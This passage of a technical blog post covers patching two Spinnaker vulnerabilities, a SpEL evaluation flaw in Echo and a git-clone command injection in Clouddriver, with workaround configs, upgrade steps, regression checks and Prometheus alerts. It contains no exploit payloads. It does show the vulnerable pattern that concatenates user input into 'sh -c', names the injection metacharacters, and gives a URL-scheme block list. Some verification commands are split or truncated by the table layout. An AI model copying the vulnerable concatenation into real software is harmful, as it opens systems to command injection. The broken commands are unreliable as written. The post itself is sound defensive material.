&lt;td&gt;&lt;code&gt;["sh", "-c", "git clone --branch " + branch + " " + url + " " + dir]&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;["git", "clone", "--branch", branch, url, dir]&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Shell invocation&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Via &lt;code&gt;sh -c&lt;/code&gt; — shell metachar interpretation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Direct &lt;code&gt;git&lt;/code&gt; call — no shell, metachar inert&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Input validation&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;BranchNameValidator&lt;/code&gt; + &lt;code&gt;RefNameValidator&lt;/code&gt; added&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Allowed character pattern&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;^[A-Za-z0-9._\-/]{1,250}$&lt;/code&gt; (git ref standard)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;URL scheme validation&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;td&gt;Only &lt;code&gt;http(s)://&lt;/code&gt;, &lt;code&gt;ssh://&lt;/code&gt;, &lt;code&gt;git@&lt;/code&gt; allowed — &lt;code&gt;file://&lt;/code&gt;, &lt;code&gt;ext::&lt;/code&gt; blocked&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;On validation failure&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;InvalidGitArtifactException&lt;/code&gt; + audit log&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The core fix is &lt;strong&gt;not going through a shell&lt;/strong&gt;. When &lt;code&gt;ProcessBuilder&lt;/code&gt; receives the argv array directly, no word-splitting occurs, so &lt;code&gt;;&lt;/code&gt;, &lt;code&gt;$(...)&lt;/code&gt;, and backticks become git "unknown ref name" rejections. The second defense line is git ref regex validation — defense-in-depth.&lt;/p&gt;

&lt;h2&gt;
  
  
  4. Temporary Mitigations — Driving Exposure Surface to Zero Before Patching
&lt;/h2&gt;

&lt;p&gt;Two workarounds are usable during the short window before the patches roll out: (1) service-level disable, (2) artifact-type-level disable. ManoIT enabled both while patches were being staged.&lt;/p&gt;

&lt;h3&gt;
  
  
  4.1 Echo SpEL Evaluation Block (Temporary CVE-2026-32613 Mitigation)
&lt;/h3&gt;

&lt;p&gt;The strongest workaround is disabling Echo entirely, but that stops all pipeline triggers (Pub/Sub, Cron, CI completion). The operational cost is too high, so ManoIT chose to &lt;strong&gt;disable only expected-artifact evaluation&lt;/strong&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# spinnaker-config/echo-local.yml&lt;/span&gt;
&lt;span class="c1"&gt;# CVE-2026-32613 workaround — disable Echo expected artifacts SpEL evaluation&lt;/span&gt;
&lt;span class="na"&gt;echo&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;pipelinetriggers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;artifacts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="c1"&gt;# Force false from April 20 until patches are applied&lt;/span&gt;
      &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;
      &lt;span class="c1"&gt;# SpEL evaluation never runs, so the unrestricted context issue is avoided&lt;/span&gt;
  &lt;span class="na"&gt;events&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="c1"&gt;# Keep triggers themselves — Cron, Pub/Sub continue to work&lt;/span&gt;
    &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;

&lt;span class="c1"&gt;# Side effect — pipelines with these patterns won't fire during the block window:&lt;/span&gt;
&lt;span class="c1"&gt;#   - Auto-deploy on Docker image push&lt;/span&gt;
&lt;span class="c1"&gt;#   - Auto-sync on Helm chart release&lt;/span&gt;
&lt;span class="c1"&gt;#   - GitOps sync on Git push&lt;/span&gt;
&lt;span class="c1"&gt;# Route these triggers temporarily via Jenkins/GitLab CI calling the Spinnaker API&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  4.2 Clouddriver Gitrepo Artifact Type Disable (Temporary CVE-2026-32604 Mitigation)
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# spinnaker-config/clouddriver-local.yml&lt;/span&gt;
&lt;span class="c1"&gt;# CVE-2026-32604 workaround — completely block gitrepo artifact type&lt;/span&gt;
&lt;span class="na"&gt;artifacts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;gitrepo&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;   &lt;span class="c1"&gt;# false from April 20 until patches are applied&lt;/span&gt;
  &lt;span class="c1"&gt;# Other artifact types unaffected&lt;/span&gt;
  &lt;span class="na"&gt;github&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;helm&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;http&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;s3&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;gcs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;

&lt;span class="c1"&gt;# Side effect — manifest sync pipelines using git/repo must move to github or http types:&lt;/span&gt;
&lt;span class="c1"&gt;#   git/repo + branch=main + path=k8s/  -&amp;gt;  github + commitish=main + path=k8s/&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  4.3 Workaround Verification Steps
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Check&lt;/th&gt;
&lt;th&gt;Command&lt;/th&gt;
&lt;th&gt;Expected&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Echo expected artifacts disabled&lt;/td&gt;
&lt;td&gt;`curl -s &lt;a href="http://echo:8089/env" rel="noopener noreferrer"&gt;http://echo:8089/env&lt;/a&gt; \&lt;/td&gt;
&lt;td&gt;jq '.echo.pipelinetriggers.artifacts.enabled'`&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Clouddriver gitrepo disabled&lt;/td&gt;
&lt;td&gt;`curl -s &lt;a href="http://clouddriver:7002/artifacts/credentials" rel="noopener noreferrer"&gt;http://clouddriver:7002/artifacts/credentials&lt;/a&gt; \&lt;/td&gt;
&lt;td&gt;jq '.[].types'`&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SpEL evaluation rejection log&lt;/td&gt;
&lt;td&gt;`kubectl logs -n spinnaker deploy/spin-echo \&lt;/td&gt;
&lt;td&gt;grep "ArtifactEvaluator disabled"`&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Gitrepo artifact creation blocked&lt;/td&gt;
&lt;td&gt;Try creating a git/repo artifact in Deck UI&lt;/td&gt;
&lt;td&gt;git/repo removed from dropdown&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Affected pipeline inventory&lt;/td&gt;
&lt;td&gt;`spin pipeline list --output json \&lt;/td&gt;
&lt;td&gt;jq '.[] \&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  5. Patch Application — Three Distributions: Halyard / Operator / Helm
&lt;/h2&gt;

&lt;p&gt;Spinnaker patch procedures vary by installation method. The 2026.x recommended order is &lt;strong&gt;Operator → Helm → Halyard&lt;/strong&gt;. ManoIT operates four internal instances — two via Operator, one via Helm, one via Halyard — so all three paths were exercised.&lt;/p&gt;

&lt;h3&gt;
  
  
  5.1 Operator-Based Upgrade (Recommended, 2026.x Standard)
&lt;/h3&gt;

&lt;p&gt;{% raw %}&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# spinnaker-config.yaml&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;spinnaker.io/v1alpha2&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;SpinnakerService&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;spinnaker&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;spinnaker&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;spinnakerConfig&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;config&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;version&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;2026.1.0&lt;/span&gt;   &lt;span class="c1"&gt;# April 20 patch — 2026.0.0 -&amp;gt; 2026.0.1, 2025.4.x -&amp;gt; 2025.4.2&lt;/span&gt;
      &lt;span class="na"&gt;persistentStorage&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;persistentStoreType&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;s3&lt;/span&gt;
      &lt;span class="na"&gt;security&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="c1"&gt;# After patching, restore the §4.1 / §4.2 workarounds to enabled: true&lt;/span&gt;
        &lt;span class="na"&gt;artifacts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;gitrepo&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;   &lt;span class="c1"&gt;# restore after patch&lt;/span&gt;
    &lt;span class="na"&gt;profiles&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;echo&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;pipelinetriggers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;artifacts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;   &lt;span class="c1"&gt;# restore after patch&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Apply + monitor rolling update&lt;/span&gt;
kubectl apply &lt;span class="nt"&gt;-f&lt;/span&gt; spinnaker-config.yaml &lt;span class="nt"&gt;-n&lt;/span&gt; spinnaker
kubectl rollout status &lt;span class="nt"&gt;-n&lt;/span&gt; spinnaker deploy/spin-echo &lt;span class="nt"&gt;--timeout&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;10m
kubectl rollout status &lt;span class="nt"&gt;-n&lt;/span&gt; spinnaker deploy/spin-clouddriver &lt;span class="nt"&gt;--timeout&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;15m

&lt;span class="c"&gt;# Version check&lt;/span&gt;
&lt;span class="k"&gt;for &lt;/span&gt;svc &lt;span class="k"&gt;in &lt;/span&gt;&lt;span class="nb"&gt;echo &lt;/span&gt;clouddriver orca gate front50&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do
  &lt;/span&gt;&lt;span class="nv"&gt;pod&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;kubectl get pod &lt;span class="nt"&gt;-n&lt;/span&gt; spinnaker &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nv"&gt;app&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;spin,cluster&lt;span class="o"&gt;=&lt;/span&gt;spin-&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;svc&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; name | &lt;span class="nb"&gt;head&lt;/span&gt; &lt;span class="nt"&gt;-1&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;
  &lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;svc&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;: &lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;kubectl &lt;span class="nb"&gt;exec&lt;/span&gt; &lt;span class="nt"&gt;-n&lt;/span&gt; spinnaker &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;pod&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="nt"&gt;--&lt;/span&gt; &lt;span class="nb"&gt;cat&lt;/span&gt; /opt/spinnaker/config/spinnaker.yml | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-A1&lt;/span&gt; &lt;span class="s1"&gt;'version:'&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;
&lt;span class="k"&gt;done&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  5.2 Helm Chart-Based Upgrade
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# OpsMx Spinnaker Helm chart (4.7.x supports 2026.1.0)&lt;/span&gt;
helm repo update opsmx
helm upgrade &lt;span class="nt"&gt;--install&lt;/span&gt; spinnaker opsmx/spinnaker &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--namespace&lt;/span&gt; spinnaker &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--version&lt;/span&gt; 4.7.2 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--set&lt;/span&gt; &lt;span class="nv"&gt;spinnakerVersion&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;2026.1.0 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--set&lt;/span&gt; profiles.echo.pipelinetriggers.artifacts.enabled&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;true&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--set&lt;/span&gt; profiles.clouddriver.artifacts.gitrepo.enabled&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;true&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--wait&lt;/span&gt; &lt;span class="nt"&gt;--timeout&lt;/span&gt; 20m

helm get values spinnaker &lt;span class="nt"&gt;-n&lt;/span&gt; spinnaker | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-E&lt;/span&gt; &lt;span class="s1"&gt;'spinnakerVersion|artifacts'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  5.3 Halyard-Based Upgrade (Legacy)
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Run inside the Halyard container — deprecated in 2026.x but many sites still use it&lt;/span&gt;
hal config version edit &lt;span class="nt"&gt;--version&lt;/span&gt; 2026.1.0
hal config features edit &lt;span class="nt"&gt;--artifacts&lt;/span&gt; &lt;span class="nb"&gt;true
&lt;/span&gt;hal deploy apply
&lt;span class="c"&gt;# Use hal deploy collect-logs after to confirm no SpEL WARNs&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  6. Post-Patch Regression Verification — Don't Block Legitimate SpEL
&lt;/h2&gt;

&lt;p&gt;The most common post-patch operational incident is &lt;strong&gt;legitimate SpEL expressions being rejected by the allowlist&lt;/strong&gt;. At ManoIT, three pipelines stopped right after patching, all matching one of these two patterns:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Pattern&lt;/th&gt;
&lt;th&gt;Pre-patch (worked)&lt;/th&gt;
&lt;th&gt;Post-patch (fails)&lt;/th&gt;
&lt;th&gt;Fix&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;&lt;code&gt;${T(java.time.LocalDate).now()}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Blocked — &lt;code&gt;java.time.LocalDate&lt;/code&gt; not allowlisted&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Use Spinnaker-provided &lt;code&gt;${execution.startTime}&lt;/code&gt; etc.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;&lt;code&gt;${T(org.apache.commons.lang3.StringUtils).join(...)}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Blocked — Apache Commons not allowlisted&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Use native Java String methods or Spinnaker helpers&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Argument-less variable reference &lt;code&gt;${parameters.version}&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Works&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;List/map indexing &lt;code&gt;${trigger.artifacts[0].name}&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Works&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Math/string &lt;code&gt;${parameters.replicas * 2}&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Works&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Three-step verification procedure:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# 1) For 1 week after the patch, harvest SpEL blocks from Echo logs&lt;/span&gt;
kubectl logs &lt;span class="nt"&gt;-n&lt;/span&gt; spinnaker deploy/spin-echo &lt;span class="nt"&gt;--since&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;168h &lt;span class="se"&gt;\&lt;/span&gt;
  | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-E&lt;/span&gt; &lt;span class="s2"&gt;"SpelEvaluationException.*not whitelisted"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  | &lt;span class="nb"&gt;awk&lt;/span&gt; &lt;span class="s1"&gt;'{print $NF}'&lt;/span&gt; | &lt;span class="nb"&gt;sort&lt;/span&gt; | &lt;span class="nb"&gt;uniq&lt;/span&gt; &lt;span class="nt"&gt;-c&lt;/span&gt; | &lt;span class="nb"&gt;sort&lt;/span&gt; &lt;span class="nt"&gt;-rn&lt;/span&gt;

&lt;span class="c"&gt;# 2) Map blocked pipelines — search the same SpEL in pipeline JSON&lt;/span&gt;
&lt;span class="k"&gt;for &lt;/span&gt;app &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="si"&gt;$(&lt;/span&gt;spin application list &lt;span class="nt"&gt;--output&lt;/span&gt; json | jq &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s1"&gt;'.[].name'&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do
  &lt;/span&gt;spin pipeline list &lt;span class="nt"&gt;--application&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$app&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="nt"&gt;--output&lt;/span&gt; json &lt;span class="se"&gt;\&lt;/span&gt;
    | jq &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="nt"&gt;--arg&lt;/span&gt; blocked &lt;span class="s2"&gt;"java.time.LocalDate"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
        &lt;span class="s1"&gt;'.[] | select(.expectedArtifacts // [] | tostring | contains($blocked)) | "\(.application)/\(.name)"'&lt;/span&gt;
&lt;span class="k"&gt;done&lt;/span&gt;

&lt;span class="c"&gt;# 3) Pattern-bulk migration PR — code-searching teams can fix in bulk&lt;/span&gt;
rg &lt;span class="nt"&gt;-uu&lt;/span&gt; &lt;span class="nt"&gt;--json&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="s1"&gt;'T\(java\.time\.LocalDate\)\.now\(\)'&lt;/span&gt; pipelines/ &lt;span class="se"&gt;\&lt;/span&gt;
  | jq &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s1"&gt;'select(.type=="match") | .data.path.text'&lt;/span&gt; | &lt;span class="nb"&gt;sort&lt;/span&gt; &lt;span class="nt"&gt;-u&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  7. Observability — Detecting Unpatched Instances and Exploit Attempts
&lt;/h2&gt;

&lt;p&gt;Just as important as the patch itself is detecting &lt;em&gt;instances that aren't patched&lt;/em&gt; and &lt;em&gt;actual exploit attempts&lt;/em&gt;. ManoIT monitors via Prometheus, Loki, and Falco — three axes.&lt;/p&gt;

&lt;h3&gt;
  
  
  7.1 Prometheus — Version Metric and Blocked SpEL Counter
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# prometheus/rules/spinnaker-cve-2026-32613-32604.yml&lt;/span&gt;
&lt;span class="na"&gt;groups&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;spinnaker-cve-2026-32613-32604&lt;/span&gt;
  &lt;span class="na"&gt;rules&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="c1"&gt;# 1) Alert if Spinnaker version is below the patched lines&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;alert&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;SpinnakerVulnerableVersion&lt;/span&gt;
    &lt;span class="na"&gt;expr&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
      &lt;span class="s"&gt;spinnaker_version_info{&lt;/span&gt;
        &lt;span class="s"&gt;version!~"^(2026\\.1\\.[0-9]+|2026\\.0\\.[1-9][0-9]*|2025\\.4\\.[2-9]|2025\\.3\\.[2-9])$"&lt;/span&gt;
      &lt;span class="s"&gt;} == 1&lt;/span&gt;
    &lt;span class="na"&gt;for&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;5m&lt;/span&gt;
    &lt;span class="na"&gt;labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;severity&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;critical&lt;/span&gt;
      &lt;span class="na"&gt;cve&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;CVE-2026-32613,CVE-2026-32604"&lt;/span&gt;
    &lt;span class="na"&gt;annotations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;summary&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Spinnaker&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;{{&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;$labels.instance&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;}}&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;runs&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;vulnerable&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;version&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;{{&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;$labels.version&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;}}"&lt;/span&gt;
      &lt;span class="na"&gt;runbook&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;https://runbooks.manoit.co.kr/spinnaker-cve-2026"&lt;/span&gt;

  &lt;span class="c1"&gt;# 2) Echo SpEL block counter rising (signal of normal post-patch behavior)&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;alert&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;EchoSpelBlockSpike&lt;/span&gt;
    &lt;span class="na"&gt;expr&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
      &lt;span class="s"&gt;rate(echo_spel_evaluation_blocked_total[5m]) &amp;gt; 0.5&lt;/span&gt;
    &lt;span class="na"&gt;for&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;10m&lt;/span&gt;
    &lt;span class="na"&gt;labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;severity&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;warning&lt;/span&gt;
    &lt;span class="na"&gt;annotations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
